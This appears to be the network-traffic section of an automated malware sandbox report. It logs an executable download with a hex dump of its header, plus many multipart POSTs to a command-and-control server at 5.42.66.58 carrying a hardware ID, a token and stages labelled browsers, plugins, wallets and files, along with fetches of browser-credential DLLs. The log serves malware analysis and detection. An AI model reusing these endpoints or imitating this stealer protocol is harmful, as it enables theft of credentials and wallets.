00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 27 Dec 2023 17:13:25 GMTContent-Type: application/x-msdos-programContent-Length: 80880Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /TukN/PL1226two.exe HTTP/1.1Host: oshi.atConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHDHost: 5.42.66.58Content-Length: 215Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 45 37 30 45 35 34 33 30 44 39 30 31 39 34 32 37 37 39 37 33 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 2d 2d 0d 0a Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="hwid"2E70E5430D901942779736------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build"default4------KJKEHIIJJECFHJKECFHD--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBGHDHCGHCAAKEBKECBHost: 5.42.66.58Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 42 47 48 44 48 43 47 48 43 41 41 4b 45 42 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------HDBGHDHCGHCAAKEBKECBContent-Disposition: form-data; name="message"browsers------HDBGHDHCGHCAAKEBKECB--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJEGIEBFIJJKFIIIJHost: 5.42.66.58Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 45 47 49 45 42 46 49 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 45 47 49 45 42 46 49 4a 4a 4b 46 49 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 45 47 49 45 42 46 49 4a 4a 4b 46 49 49 49 4a 2d 2d 0d 0a Data Ascii: ------AEGHJEGIEBFIJJKFIIIJContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------AEGHJEGIEBFIJJKFIIIJContent-Disposition: form-data; name="message"plugins------AEGHJEGIEBFIJJKFIIIJ--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGHHost: 5.42.66.58Content-Length: 8255Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/sqlite3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDHDHJEBGHJKFIECBGCBHost: 5.42.66.58Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKECFCFBGDHIECAAFIIDHost: 5.42.66.58Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBKHost: 5.42.66.58Content-Length: 355Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 4a 4a 45 48 43 42 41 4b 46 42 46 48 4a 4b 46 42 4b 2d 2d 0d 0a Data Ascii: ------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------CBKJJEHCBAKFBFHJKFBKContent-Disposition: form-data; name="file"------CBKJJEHCBAKFBFHJKFBK--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCAAKJDHJJJJJKKKFHost: 5.42.66.58Content-Length: 355Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 4e 54 45 35 4e 54 55 31 4e 53 35 6d 61 57 78 6c 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 48 43 47 43 41 41 4b 4a 44 48 4a 4a 4a 4a 4a 4b 4b 4b 46 2d 2d 0d 0a Data Ascii: ------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="file_name"NTE5NTU1NS5maWxl------FHCGCAAKJDHJJJJJKKKFContent-Disposition: form-data; name="file"------FHCGCAAKJDHJJJJJKKKF--
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/freebl3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/mozglue.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/msvcp140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/nss3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/softokn3.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f059ec3d7eb90876/vcruntime140.dll HTTP/1.1Host: 5.42.66.58Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJDAFCFHIEHJJKEHJKHost: 5.42.66.58Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJEHost: 5.42.66.58Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="message"wallets------HIIIDAKKJJJKKECAKKJE--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEGHJKJKKJDHIDHJKJDBHost: 5.42.66.58Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 34 37 38 30 33 39 31 37 31 35 30 63 36 30 33 37 36 34 65 33 62 65 39 37 31 33 36 36 66 34 39 64 61 61 62 65 64 63 66 31 62 35 32 35 66 63 61 61 64 34 64 62 66 32 30 39 37 62 38 34 39 34 32 34 32 32 64 33 62 35 65 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 4a 4b 4a 4b 4b 4a 44 48 49 44 48 4a 4b 4a 44 42 2d 2d 0d 0a Data Ascii: ------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="token"47803917150c603764e3be971366f49daabedcf1b525fcaad4dbf2097b84942422d3b5e5------AEGHJKJKKJDHIDHJKJDBContent-Disposition: form-data; name="message"files------AEGHJKJKKJDHIDHJKJDB--
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKFHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIEHIIEHIEHJKEBKEHJHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGIJECGDGCBKECAKFBGCHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEBFBFIEHIDAAAAFHCFHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFHHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBKECFCFBGCAAKEGIJDHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBAEHCAEGDHJKFHJKFIHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAEHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJJDGHCBGDHIECBGIDHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCBFHJDHJKECAKEHIDHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEHIIIJDAAAAAAKECBFHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAKFIIDGIEHIDGCGHIIHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAEBGHCFCAAFIECAFIIIHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIDGDBGCAAFIDHIJKEHHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAAHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGDBGCBGIDHCBGDHIEBFHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIEHIIIJDAAAAAAKECBHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKECHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAFBGHIDBGHJJKFHJDHCHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGHCGCBKFIECBFHIDGHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJKJEHJKJEBGHJJKEBGIHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAAAAAAAAAAAAAAAAAAAHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBAKKFHJDBKKEBFHDAAEHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIIJDHCGCBKECBFIJKKHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFBHost: 5.42.66.58Content-Length: 1759Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDAHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECFHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBGHCAKKFBGDHJJJKECFHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFIIHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJKKJJDAAAAAKFHJJDGHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFIIIIJKFCAAECAKFIEHHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAKKJJJKJKECBGCGDAHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KECBFBAEBKJJJJKFCGCBHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /3886d2276f6914c4.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 5.42.66.58Content-Length: 1743Connection: Keep-AliveCache-Control: no-cache
